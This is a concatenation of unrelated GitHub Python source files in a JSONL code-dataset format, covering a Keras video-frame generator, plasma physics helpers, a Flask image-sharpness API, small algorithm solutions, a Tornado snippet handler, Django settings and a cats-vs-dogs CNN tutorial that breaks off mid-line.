`~/.keras/keras.json`.\n If you never set it, then it will be \"channels_last\".\n \"\"\"\n\n def __init__(self, rescale=None):\n self.rescale = rescale\n self.image_data_generator = ImageDataGenerator(rescale=rescale)\n return\n\n def standardize(self, x):\n \"\"\"Apply the normalization configuration to a batch of inputs.\n\n # Arguments\n x: batch of inputs to be normalized.\n\n # Returns\n The inputs, normalized.\n \"\"\"\n if self.preprocessing_function:\n x = self.preprocessing_function(x)\n if self.rescale:\n x *= self.rescale\n # x is a single image, so it doesn't have image number at index 0\n img_channel_axis = self.channel_axis - 1\n if self.samplewise_center:\n x -= np.mean(x, axis=img_channel_axis, keepdims=True)\n if self.samplewise_std_normalization:\n x /= (np.std(x, axis=img_channel_axis, keepdims=True) + 1e-7)\n\n if self.featurewise_center:\n if self.mean is not None:\n x -= self.mean\n else:\n warnings.warn('This ImageDataGenerator specifies '\n '`featurewise_center`, but it hasn\\'t'\n 'been fit on any training data. Fit it '\n 'first by calling `.fit(numpy_data)`.')\n if self.featurewise_std_normalization:\n if self.std is not None:\n x /= (self.std + 1e-7)\n else:\n warnings.warn('This ImageDataGenerator specifies '\n '`featurewise_std_normalization`, but it hasn\\'t'\n 'been fit on any training data. 
Fit it '\n 'first by calling `.fit(numpy_data)`.')\n if self.zca_whitening:\n if self.principal_components is not None:\n flatx = np.reshape(x, (-1, np.prod(x.shape[-3:])))\n whitex = np.dot(flatx, self.principal_components)\n x = np.reshape(whitex, x.shape)\n else:\n warnings.warn('This ImageDataGenerator specifies '\n '`zca_whitening`, but it hasn\\'t'\n 'been fit on any training data. Fit it '\n 'first by calling `.fit(numpy_data)`.')\n return x\n\n def random_transform(self, x, seed=None):\n \"\"\"Randomly augment a single image tensor.\n\n # Arguments\n x: 3D tensor, single image.\n seed: random seed.\n\n # Returns\n A randomly transformed version of the input (same shape).\n \"\"\"\n # x is a single image, so it doesn't have image number at index 0\n img_row_axis = self.row_axis - 1\n img_col_axis = self.col_axis - 1\n img_channel_axis = self.channel_axis - 1\n\n if seed is not None:\n np.random.seed(seed)\n\n # use composition of homographies\n # to generate final transform that needs to be applied\n if self.rotation_range:\n theta = np.pi / 180 * np.random.uniform(-self.rotation_range, self.rotation_range)\n else:\n theta = 0\n\n if self.height_shift_range:\n tx = np.random.uniform(-self.height_shift_range, self.height_shift_range) * x.shape[img_row_axis]\n else:\n tx = 0\n\n if self.width_shift_range:\n ty = np.random.uniform(-self.width_shift_range, self.width_shift_range) * x.shape[img_col_axis]\n else:\n ty = 0\n\n if self.shear_range:\n shear = np.random.uniform(-self.shear_range, self.shear_range)\n else:\n shear = 0\n\n if self.zoom_range[0] == 1 and self.zoom_range[1] == 1:\n zx, zy = 1, 1\n else:\n zx, zy = np.random.uniform(self.zoom_range[0], self.zoom_range[1], 2)\n\n transform_matrix = None\n if theta != 0:\n rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],\n [np.sin(theta), np.cos(theta), 0],\n [0, 0, 1]])\n transform_matrix = rotation_matrix\n\n if tx != 0 or ty != 0:\n shift_matrix = np.array([[1, 0, tx],\n [0, 1, ty],\n [0, 0, 1]])\n transform_matrix = shift_matrix if transform_matrix is None else np.dot(transform_matrix, shift_matrix)\n\n if shear != 0:\n shear_matrix = np.array([[1, -np.sin(shear), 0],\n [0, np.cos(shear), 0],\n [0, 0, 1]])\n transform_matrix = shear_matrix if transform_matrix is None else np.dot(transform_matrix, shear_matrix)\n\n if zx != 1 or zy != 1:\n zoom_matrix = np.array([[zx, 0, 0],\n [0, zy, 0],\n [0, 0, 1]])\n transform_matrix = zoom_matrix if transform_matrix is None else np.dot(transform_matrix, zoom_matrix)\n\n if transform_matrix is not None:\n h, w = x.shape[img_row_axis], x.shape[img_col_axis]\n transform_matrix = transform_matrix_offset_center(transform_matrix, h, w)\n x = apply_transform(x, transform_matrix, img_channel_axis,\n fill_mode=self.fill_mode, cval=self.cval)\n\n if self.channel_shift_range != 0:\n x = random_channel_shift(x,\n self.channel_shift_range,\n img_channel_axis)\n if self.horizontal_flip:\n if np.random.random() < 0.5:\n x = flip_axis(x, img_col_axis)\n\n if self.vertical_flip:\n if np.random.random() < 0.5:\n x = flip_axis(x, img_row_axis)\n\n return x\n\n def flow(self, x, y=None, batch_size=32, shuffle=True, seed=None,\n save_to_dir=None, save_prefix='', save_format='png'):\n raise Exception(\"Unsupported operation!\")\n\n def flow_from_directory(self, directory,\n target_size=(256, 256), color_mode='rgb',\n classes=None, class_mode='categorical',\n batch_size=32, shuffle=True, seed=None,\n save_to_dir=None,\n save_prefix='',\n save_format='png',\n follow_links=False):\n raise 
Exception(\"Unsupported operation!\")\n\n def flow_from_csv(self, csv_file_path, is_train,batch_size,save_to_dir=None,target_size=(112,112),nb_seq=16):\n return CsvFileIterator(csv_file_path, is_train,batch_size=batch_size, target_size=target_size,nb_seq=nb_seq,\n image_data_generator = self.image_data_generator, shuffle=is_train,save_to_dir=save_to_dir)\n\n\nclass CsvFileIterator(Iterator):\n \"\"\"Iterator capable of reading images from a csv file.\n\n # Arguments\n directory: Path to the directory to read images from.\n Each subdirectory in this directory will be\n considered to contain images from one class,\n or alternatively you could specify class subdirectories\n via the `classes` argument.\n image_data_generator: Instance of `ImageDataGenerator`\n to use for random transformations and normalization.\n target_size: tuple of integers, dimensions to resize input images to.\n color_mode: One of `\"rgb\"`, `\"grayscale\"`. Color mode to read images.\n classes: Optional list of strings, names of sudirectories\n containing images from each class (e.g. `[\"dogs\", \"cats\"]`).\n It will be computed automatically if not set.\n class_mode: Mode for yielding the targets:\n `\"binary\"`: binary targets (if there are only two classes),\n `\"categorical\"`: categorical targets,\n `\"sparse\"`: integer targets,\n `\"input\"`: targets are images identical to input images (mainly\n used to work with autoencoders),\n `None`: no targets get yielded (only input images are yielded).\n batch_size: Integer, size of a batch.\n shuffle: Boolean, whether to shuffle the data between epochs.\n seed: Random seed for data shuffling.\n data_format: String, one of `channels_first`, `channels_last`.\n save_to_dir: Optional directory where to save the pictures\n being yielded, in a viewable format. 
This is useful\n for visualizing the random transformations being\n applied, for debugging purposes.\n save_prefix: String prefix to use for saving sample\n images (if `save_to_dir` is set).\n save_format: Format to use for saving sample images\n (if `save_to_dir` is set).\n \"\"\"\n\n def __init__(self, csv_file_path, is_train, image_data_generator, target_size=(256, 256), color_mode='rgb',\n classes=None, class_mode='categorical',nb_seq=16,\n batch_size=32, shuffle=True, seed=None,\n data_format=None,\n save_to_dir=None, save_prefix='', save_format='png'):\n if data_format is None:\n data_format = K.image_data_format()\n self.csv_file_path = csv_file_path\n self.target_size = tuple(target_size)\n self.image_data_generator = image_data_generator\n if color_mode not in {'rgb', 'grayscale'}:\n raise ValueError('Invalid color mode:', color_mode,\n '; expected \"rgb\" or \"grayscale\".')\n self.color_mode = color_mode\n self.data_format = data_format\n if self.color_mode == 'rgb':\n if self.data_format == 'channels_last':\n self.image_shape = self.target_size + (3,)\n else:\n self.image_shape = (3,) + self.target_size\n else:\n if self.data_format == 'channels_last':\n self.image_shape = self.target_size + (1,)\n else:\n self.image_shape = (1,) + self.target_size\n self.classes = classes\n if class_mode not in {'categorical'}:\n raise ValueError('Invalid class_mode:', class_mode,\n '; expected one of \"categorical\"')\n self.class_mode = class_mode\n self.save_to_dir = save_to_dir\n self.save_prefix = save_prefix\n self.save_format = save_format\n\n self.data = CsvFileIterator.get_data(csv_file_path, is_train)\n\n # first, count the number of samples and classes\n self.samples = len(self.data)\n\n if not classes:\n classes = CsvFileIterator.get_classes(self.data)\n\n self.num_class = len(classes)\n self.class_indices = dict(zip(classes, range(len(classes))))\n\n print('Found %d images belonging to %d classes.' % (self.samples, self.num_class))\n\n # second, build an index of the images in the different class subfolders\n results = []\n\n self.sample_names = []\n self.classes = np.zeros((self.samples,), dtype='int32')\n self.data_dir = os.path.dirname(csv_file_path)\n self.nb_seq=nb_seq\n for idx, sample in enumerate(self.data):\n type, _class, filename, _ = sample\n self.classes[idx] = self.class_indices[_class]\n self.sample_names.append(self.data_dir+'/'+ type + '/' + _class + '/' + filename)\n\n super(CsvFileIterator, self).__init__(self.samples, batch_size, shuffle, seed)\n\n @staticmethod\n def get_data(data_file, is_train):\n \"\"\"Load our data from file.\"\"\"\n with open(data_file, 'r') as fin:\n reader = csv.reader(fin)\n data = list(reader)\n\n res = []\n target_type = 'Train' if is_train else 'Val'\n for sample in data:\n type, _, _, nb_sub_samples = sample\n if type == target_type and int(nb_sub_samples)>0:\n res.append(sample)\n\n return res\n\n @staticmethod\n def get_classes(data):\n \"\"\"Extract the classes from our data. If we want to limit them,\n only return the classes we need.\"\"\"\n classes = []\n for item in data:\n if item[CLASS_INDEX] not in classes:\n classes.append(item[CLASS_INDEX])\n\n # Sort them.\n classes = sorted(classes)\n\n # Return.\n return classes\n\n def get_sub_sample_paths(self, sample_path):\n \"\"\"Given a path to sample (filename without extension and index), build our sample or in other name sub sample sequence.\n\n e.g. 
given C:/data/Val/angry/1\n return C:/data/Val/angry/1_001.jpg,C:/data/Val/angry/1_002.jpg,C:/data/Val/angry/1_003.jpg,..\n \"\"\"\n sub_samples = sorted(glob.glob(sample_path + '*jpg'))\n\n return sub_samples\n\n def next(self):\n \"\"\"For python 2.x.\n\n # Returns\n The next batch.\n \"\"\"\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n return self._get_batches_of_transformed_samples(index_array)\n\n\n def _get_batches_of_transformed_samples(self, index_array):\n\n current_batch_size=len(index_array)\n\n # The transformation of images is not under thread lock\n # so it can be done in parallel\n batch_x = np.zeros((current_batch_size, self.nb_seq,) + self.image_shape, dtype=K.floatx())\n grayscale = self.color_mode == 'grayscale'\n # build batch of image data\n for i, j in enumerate(index_array):\n sname = self.sample_names[j]\n sub_sample_paths = self.get_sub_sample_paths(sname)\n sample = []\n\n for sub_sample_path in sub_sample_paths:\n sub_sample = load_img(sub_sample_path,\n grayscale=grayscale,\n target_size=self.target_size)\n x = img_to_array(sub_sample, data_format=self.data_format)\n x = self.image_data_generator.random_transform(x)\n x = self.image_data_generator.standardize(x)\n sample.append(x)\n batch_x[i] = np.array(sample)\n # optionally save augmented images to disk for debugging purposes\n if self.save_to_dir:\n for i in range(current_batch_size):\n for seq_idx in range(len(batch_x[i])):\n img = array_to_img(batch_x[i][seq_idx], self.data_format, scale=True)\n fname = 'class{_class}_{prefix}_{subindex}_{hash}.{format}'.format(\n _class=self.classes[index_array[i]],\n prefix=self.save_prefix,\n subindex=seq_idx,\n hash=np.random.randint(1e4),\n format=self.save_format)\n img.save(os.path.join(self.save_to_dir, fname))\n # build batch of labels\n batch_y = np.zeros((len(batch_x), self.num_class), dtype=K.floatx())\n for i, label in enumerate(self.classes[index_array]):\n batch_y[i, label] = 1.\n\n return batch_x, batch_y\n","repo_name":"habanoz/deep-emotion-recognition-src","sub_path":"util/generator/SequenceImageGenerator.py","file_name":"SequenceImageGenerator.py","file_ext":"py","file_size_in_byte":17871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"38532486513","text":"import torch \nimport numpy as np \n\nboltzmann_constant = 1.380e-23\nmu_0 = 1.256e-6 \n\ndef find_tesep(profs): \n ne, te = profs[:, 0], profs[:, 1]\n teseps, neseps, rseps = np.empty(te.shape[0]), np.empty(te.shape[0]), np.empty(te.shape[0])\n for k, (ne_slice, te_slice) in enumerate(zip(ne, te)): \n l_idx, r_idx = 0, 1\n while te_slice[r_idx] > 100: \n l_idx += 1\n r_idx += 1 \n if r_idx == 50:# or (len(te_slice) == 60 and r_idx == 60): \n break \n\n if r_idx == 50:\n continue \n weights_r, weights_l = get_weights(te_slice, l_idx, r_idx)\n tesep_estimation = weights_l*te_slice[l_idx] + weights_r*te_slice[r_idx]\n nesep_estimation = weights_l*ne_slice[l_idx] + weights_r*ne_slice[r_idx]\n # rsep_estimation = weights_l*r_slice[l_idx] + weights_r*r_slice[r_idx]\n teseps[k] = tesep_estimation\n neseps[k] = nesep_estimation\n rseps[k] = l_idx\n # rsep_estimation = weights_l*x[idx_l] + weights_r*x[idx_r]\n return teseps, neseps, rseps\n\ndef get_weights(te, idx_l, idx_r, query=100):\n # Gets the interpolation weights as usual\n dist = te[idx_r] - query + query - te[idx_l]\n weights = (1-(te[idx_r] - query)/dist, 1-(query - te[idx_l])/dist)\n return weights\n\ndef 
static_pressure_stored_energy_approximation(profs):\n if not isinstance(profs, torch.Tensor): \n profs = torch.from_numpy(profs)\n return boltzmann_constant*torch.prod(profs, 1).sum(1)\ndef torch_shaping_approx(minor_radius, tri_u, tri_l, elongation):\n triangularity = (tri_u + tri_l) / 2.0\n b = elongation*minor_radius\n gamma_top = -(minor_radius + triangularity)\n gamma_bot = minor_radius - triangularity\n alpha_top = -gamma_top / (b*b)\n alpha_bot = -gamma_bot / (b*b)\n top_int = (torch.arcsinh(2*torch.abs(alpha_top)*b) + 2*torch.abs(alpha_top)*b*torch.sqrt(4*alpha_top*alpha_top*b*b+1)) / (2*torch.abs(alpha_top))\n bot_int = (torch.arcsinh(2*torch.abs(alpha_bot)*b) + 2*torch.abs(alpha_bot)*b*torch.sqrt(4*alpha_bot*alpha_bot*b*b+1)) / (2*torch.abs(alpha_bot))\n return bot_int + top_int \n\ndef bpol_approx(minor_radius, tri_u, tri_l, elongation, current): \n shaping = torch_shaping_approx(minor_radius, tri_u, tri_l, elongation)\n return mu_0*current / shaping\n\ndef calculate_peped(profs): \n if not isinstance(profs, torch.Tensor): \n profs = torch.from_numpy(profs)\n ne = profs[:, 0:1, :]\n te = profs[:, 1:, :]\n p = boltzmann_constant*ne*te\n second_diff = torch.diff(p, n=2, dim=-1)\n min_diff_val, min_diff_idx = torch.min(second_diff, dim=-1)\n ped_loc = min_diff_idx -2\n peped = torch.zeros((len(p)))\n for k in range(len(peped)): \n peped[k] = torch.select(p[k], dim=-1, index=ped_loc[k].item()) \n return peped, ped_loc\ndef beta_approximation(profiles_tensors, minor_radius, tri_u, tri_l, elongation, current, bt, beta_pol=False):\n \"\"\"\n To approximate beta! \n The factor of 2 at the front is to compensate the ions which are nowhere to be found in this analysis. \n The additional factor of 100 is to get it in percent form. \n \"\"\"\n e_c = 1.602e-19\n bpol = bpol_approx(minor_radius, tri_u, tri_l, elongation, current)\n if beta_pol: \n pressure_ped, _ = calculate_peped(profiles_tensors)\n beta_pol_approx = 2*mu_0*pressure_ped / (bpol*bpol)\n return beta_pol_approx \n density, temperature = profiles_tensors[:, 0, :], profiles_tensors[:, 1, :]\n pressure_prof = density*temperature\n pressure_average = pressure_prof.mean(-1)\n # TODO: This beta average is not really realistic I find... but am interested to see how it impacts\n return (100*2)*e_c*2*mu_0 * pressure_average / (bt*bt + bpol*bpol)\n\ndef pressure_calculation(profs: torch.Tensor, dataset=None, normalize=True): \n if normalize and dataset is not None: \n profs = dataset.denorm_profiles(profs.copy())\n return boltzmann_constant*torch.prod(profs, 1)\n\ndef calculate_physics_constraints(profiles_og, mps_og, train_set):\n # Denormalize everything! 
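    # Shape assumptions (inferred from the indexing in this function, not
    # stated in the source): profiles_og is (batch, 2, n_points) with
    # channel 0 = ne and channel 1 = te; mps_og has at least 10 columns; and
    # train_set must supply denorm_profiles/denorm_mps. A hypothetical smoke
    # test of the helpers above could look like:
    #   profiles = torch.rand(4, 2, 50)
    #   mps = torch.rand(4, 10)
    #   sp, beta, bpol, p = calculate_physics_constraints(profiles, mps, train_set)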
\n profiles = torch.clone(profiles_og)\n profiles = train_set.denorm_profiles(profiles, to_torch=True)\n mps = torch.clone(mps_og)\n mps = train_set.denorm_mps(mps, to_torch=True)\n sp = static_pressure_stored_energy_approximation(profiles)\n minor_radius, tri_u, tri_l, elongation, current, bt = mps[:, 2], mps[:, 4],mps[:, 5],mps[:, 6], mps[:, 8], mps[:, 9]\n bpol = bpol_approx(minor_radius, tri_u, tri_l, elongation, current)\n beta = beta_approximation(profiles, minor_radius, tri_u, tri_l, elongation, current, bt)\n pressure = pressure_calculation(profiles, normalize=False)\n\n return sp, beta, bpol, pressure\n","repo_name":"fusionby2030/psi_2022","sub_path":"src/common/physics_approximations.py","file_name":"physics_approximations.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7082144469","text":"import os\nimport cv2\nfrom PIL import Image\nimport time\nimport numpy as np\nimport pickle\nfrom flask import Flask\nimport pandas as pd\nimport jsonpickle\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n count = 1\n a = []\n #api endpoint of doucment data\n path = \"geeva22/Flask-api-for-document-quality-estimation/Aadhar/\" #C:\\Users\\Admin\\Downloads\\Work-idrbt\\crops\\Aadhar\n\n for file_name in os.listdir(path):\n if file_name.split(\".\")[-1].lower() in {\"jpeg\", \"jpg\", \"png\"}:\n img = cv2.imread(path + file_name)\n grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n lapla = cv2.Laplacian(grey, cv2.CV_64F).var()\n count += 1\n a.append(file_name)\n a.append(lapla)\n\n def Convert(a):\n it = iter(a)\n res_dct = dict(zip(it, it))\n return res_dct\n\n lst = a\n s = sorted(Convert(lst).items(), key=lambda x: x[1])\n m = s[-1][0]\n # print('Better quality image -',m)\n #end = time.perf_counter()\n # print('Execution time -',end-start)\n im = Image.open(path + m)\n out = np.array(im)\n lis = out.tolist()\n return jsonpickle.encode(lis)\n\nif __name__ ==\"__main__\":\n app.run(debug=True)\n","repo_name":"geeva22/Flask-api-for-document-quality-estimation","sub_path":"document_api.py","file_name":"document_api.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19584080779","text":"\n# list1 = [\"Shogun\",\"Piatti\",\"Tapioca Express\",\"Burger King\",\"KFC\"]\n# list2 = [\"Piatti\",\"The Grill at Torrey Pines\",\"Hungry Hunter Steakhouse\",\"Shogun\"]\nlist1 = [\"happy\",\"sad\",\"good\"]\nlist2 = [\"sad\",\"happy\",\"good\"]\ndef findRestaurant(list1,list2):\n l1 = {j:i for i,j in enumerate(list1)}\n l2 = {j:i for i,j in enumerate(list2)}\n d={}\n for i in l1:\n if i in l2:\n \n val = l1[i]+l2[i]\n d[i]=val\n\n m = min(list(d.values()))\n res = []\n for key,val in d.items():\n if val <= m:\n m=val\n res.append(key)\n return res\n\nprint(findRestaurant(list1,list2))","repo_name":"Parikalp-Bhardwaj/Dsa-golang-python","sub_path":"Minimum_Index_Sum_of_Two_Lists/Minimum_Index_Sum_of_Two_Lists.py","file_name":"Minimum_Index_Sum_of_Two_Lists.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74931481101","text":"import math\nimport sys\n\ndef findMin(curr):\n it = 0\n while curr % 2 != 0:\n curr = curr // 2\n it += 1\n return it\n\nfor _ in range(int(input())):\n l = int(input())\n nums = list(map(int,input().split()))\n s = sum(nums)\n ans = sys.maxsize\n if s % 2 != 0:\n for 
num in nums:\n it = findMin(num)\n ans = min(it,ans) \n print(ans)\n else:\n print(0)\n # for num in nums:\n # if num % 2 == 0:\n # count_even += 1\n # even_min = min(num,even_min)\n # else:\n # cout_odd += 1\n # odd_min = min(num,odd_min)\n \n # if cout_odd % 2 == 0:\n # print(0)\n # else:\n # print(int(min(math.log(odd_min + 1,2),math.log(even_min,2))))\n","repo_name":"LibenHailu/interview-prep","sub_path":"practice/A_Divide_and_Conquer.py","file_name":"A_Divide_and_Conquer.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"26172383133","text":"from tornado import web\nimport json, re\n\nclass Doc(web.RequestHandler):\n def initialize(self, data):\n self._documents = data\n\n def head(self):\n self.finish()\n\n def get(self):\n did = self.get_argument('id', None)\n dids = did or self.get_argument('ids', '')\n dq = self.get_argument('q', '')\n results = []\n for doc_id in dids.split(','):\n title, text = self._documents[int(doc_id)]\n result = {'doc_id': doc_id,\n 'title': title,\n 'url': self._get_url_from_title(title),\n 'snippet': self._get_snippet(text, dq)}\n results.append(result)\n self.finish(json.dumps({'results': results}))\n\n def _get_snippet(self, text, query):\n # MD - This is unnecessary\n lower_text = text.lower()\n lower_query = query.lower()\n emphasizable_terms = [pot for pot in lower_query.split() if pot in lower_text and len(pot) > 1]\n if len(emphasizable_terms) == 0: return '...'\n snippet_start_term = query if lower_query in lower_text else emphasizable_terms[0]\n term_start = lower_text.find(snippet_start_term)\n min_snippet_start = term_start - 200\n snippet_start = 0 if min_snippet_start <= 0 else lower_text.find(' ', min_snippet_start)\n max_snippet_end = term_start + len(snippet_start_term) + 200\n snippet_stop = len(text) if max_snippet_end >= len(text) else lower_text.rfind(' ', snippet_start, max_snippet_end) + 1\n snippet = text[snippet_start:snippet_stop]\n if len(emphasizable_terms) > 0:\n snippet = re.sub(r'(\b' + r'\b|\b'.join([re.escape(t) for t in emphasizable_terms]) + r'\b)', r'\1', snippet, flags=re.IGNORECASE)\n if snippet_start > 0:\n snippet = '...' + snippet\n if snippet_stop < len(text):\n snippet = snippet + '...'\n return snippet\n\n def _get_url_from_title(self, title):\n return 'http://en.wikipedia.org/wiki/' + title.replace(' ', '_')\n\n","repo_name":"guolei329/SEA-Assignments","sub_path":"assignment2/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
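The `_get_snippet` handler above trims a ~200-character window around the first query match; its final `re.sub` uses the bare replacement `r'\1'`, which is a no-op and looks like markup that was stripped from the source. A minimal standalone sketch of the presumable emphasis step — the `<b>` tag is an assumption, not taken from the record:

import re

def emphasize(snippet, terms):
    # Join the escaped terms into one alternation so a single pass wraps
    # every whole-word, case-insensitive match in (assumed) <b>...</b> tags.
    pattern = r'(\b' + r'\b|\b'.join(re.escape(t) for t in terms) + r'\b)'
    return re.sub(pattern, r'<b>\1</b>', snippet, flags=re.IGNORECASE)

print(emphasize('Tornado handlers make search snippets easy', ['search']))
# -> Tornado handlers make <b>search</b> snippets easy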
+{"seq_id":"14930633729","text":"import logging\nimport locale\nimport django\nimport os\n\nfrom settings import *\n\nlocale.setlocale(locale.LC_ALL, 'en_US.UTF-8')\n\nDATABASES = {\n\t'default': {\n\t\t'ENGINE': 'django.db.backends.mysql',\n\t\t'NAME': 'librarygadget',\n\t\t'USER': 'root',\n\t\t'PASSWORD': '',\n\t\t'HOST': '127.0.0.1',\n\t\t'PORT': ''\n\t}\n}\n\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': '127.0.0.1:11211',\n }\n}\n\nROOT_URLCONF = 'urls'\n\nlogging.basicConfig(\n level = logging.INFO, # logging.WARNING,\n format = '%(asctime)s %(levelname)s %(message)s',\n filename = os.path.join(SITE_ROOT, '/var/log/librarygadget/trace.log'),\n filemode = 'ab+',\n)\n\n\n","repo_name":"bluestemscott/librarygadget","sub_path":"librarygadget/settings_vagrant.py","file_name":"settings_vagrant.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"9854027985","text":"import pandas as pd \nfrom utility import hamming_scoreCV\n\n\n\nif __name__ == \"__main__\":\n data = pd.read_csv('subset_data/BH_bipirate.csv')\n\n Y = data[['Beach','Sunset','FallFoliage','Field','Mountain','Urban']]\n X = data.drop(columns= Y)\n\n score, clf, correct, incorrect = hamming_scoreCV(X, Y)","repo_name":"HiteshKhandelwal901/Feature_Selection_Algorithms_py","sub_path":"Black_Hole/subset_data/blackhole_run.py","file_name":"blackhole_run.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"3433783544","text":"import os, shutil\n\n'''A network for recognizing dogs and cats.\nSince there is no training data available, only the network structure is built.'''\ndef init():\n '''Used to move the images into place'''\n # Path where the data archive was unpacked\n original_dataset_dir = '/Users/chenyi/Documents/人工智能/all/train'\n # Build a dedicated path for storing the images\n base_dir = 'data/cats_and_dogs_small'\n os.makedirs(base_dir, exist_ok=True)\n # Build paths for the training, validation and test data\n train_dir = os.path.join(base_dir, 'train')\n os.makedirs(train_dir, exist_ok = True)\n test_dir = os.path.join(base_dir, 'test')\n os.makedirs(test_dir, exist_ok = True)\n validation_dir = os.path.join(base_dir, 'validation')\n os.makedirs(validation_dir, exist_ok = True)\n\n # Path for cat images used to train the network\n train_cats_dir = os.path.join(train_dir, 'cats')\n os.makedirs(train_cats_dir, exist_ok = True)\n # Path for dog images used to train the network\n train_dogs_dir = os.path.join(train_dir, 'dogs')\n os.makedirs(train_dogs_dir, exist_ok = True)\n\n # Path for cat images used to validate the network\n validation_cats_dir = os.path.join(validation_dir, 'cats')\n os.makedirs(validation_cats_dir, exist_ok = True)\n # Path for dog images used to validate the network\n validation_dogs_dir = os.path.join(validation_dir, 'dogs')\n os.makedirs(validation_dogs_dir, exist_ok = True)\n\n # Path for cat images used to test the network\n test_cats_dir = os.path.join(test_dir, 'cats')\n os.makedirs(test_cats_dir, exist_ok = True)\n # Path for dog images used to test the network\n test_dogs_dir = os.path.join(test_dir, 'dogs')\n os.makedirs(test_dogs_dir, exist_ok = True)\n\n\n # Copy the first 1000 cat images to the training path\n fnames = ['cat.{}.jpg'.format(i) for i in range(1000)]\n for fname in fnames:\n src = 
os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n # Copy the next 500 cat images to the validation path\n fnames = ['cat.{}.jpg'.format(i) for i in range(1000, 1500)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n # Copy the next 500 cat images to the test path\n fnames = ['cat.{}.jpg'.format(i) for i in range(1500, 2000)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n # Copy 1000 dog images to the training path\n fnames = ['dog.{}.jpg'.format(i) for i in range(1000)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n # Copy the next 500 dog images to the validation path\n fnames = ['dog.{}.jpg'.format(i) for i in range(1000, 1500)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n # Copy the next 500 dog images to the test path\n fnames = ['dog.{}.jpg'.format(i) for i in range(1500, 2000)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n print('total training cat images: ', len(os.listdir(train_cats_dir)))\n\n print('total training dog images', len(os.listdir(train_dogs_dir)))\n\n print('total validation cat images', len(os.listdir(validation_cats_dir)))\n\n print('total validation dog images', len(os.listdir(validation_dogs_dir)))\n\n print('total test cat images:', len(os.listdir(test_cats_dir)))\n\n print('total test dog images:', len(os.listdir(test_dogs_dir)))\n\n\n'''Build the network architecture'''\nfrom keras import layers\nfrom keras import models\nfrom keras import optimizers\n\nmodel = models.Sequential()\n# Input images are 150*150; the 3 means each pixel is an (R,G,B) triple\nmodel.add(layers.Conv2D(32, (3,3), activation='relu', input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Conv2D(64, (3,3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Conv2D(128, (3,3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Conv2D(128, (3,3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\nmodel.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4),\n metrics=['acc'])\n\nmodel.summary()\n\n
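# An illustrative aside (comments only; shapes follow from the layers above):
# four Conv2D/MaxPooling2D stages shrink each 150x150x3 input to 7x7x128,
# which Flatten turns into 6272 values before the 512-unit dense layer and
# the single sigmoid output. A dummy forward pass would confirm the shape:
#   import numpy as np
#   print(model.predict(np.zeros((1, 150, 150, 3))).shape)  # -> (1, 1)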
'''Load the data into memory'''\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./ 255) # Divide pixel values by 255 so they fall between 0 and 1\ntest_datagen = ImageDataGenerator(rescale = 1. / 255)\n\n# The generator reads data into memory in batches, so the code can iterate over it conveniently with for...in\n# class_mode: since we only have cat and dog images, the label is either 0 or 1\n# train_dir contains exactly two folders, so images read from them are labelled 0 and 1 respectively.\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=(150, 150),\n batch_size=20,class_mode = 'binary')\nvalidation_generator = test_datagen.flow_from_directory(validation_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary')\n# class_mode gives every image a label; we read 20 images at a time, so a (20,) label array comes along\n# The concrete label values are not set here; they are used later by us\nfor data_batch, labels_batch in train_generator:\n print('data batch shape: ', data_batch.shape)\n print('labels batch shape: ', labels_batch.shape)\n break\n\n'''Train on the data'''\n# The model accepts a generator directly as input; ours yields 20 images per batch\n# There are 2000 images in total, so we set steps_per_epoch = 100,\n# so that each epoch loops 100 times over train_generator with for...in and reads all 2000 images,\n# and we train the model for 30 epochs\nhistory = 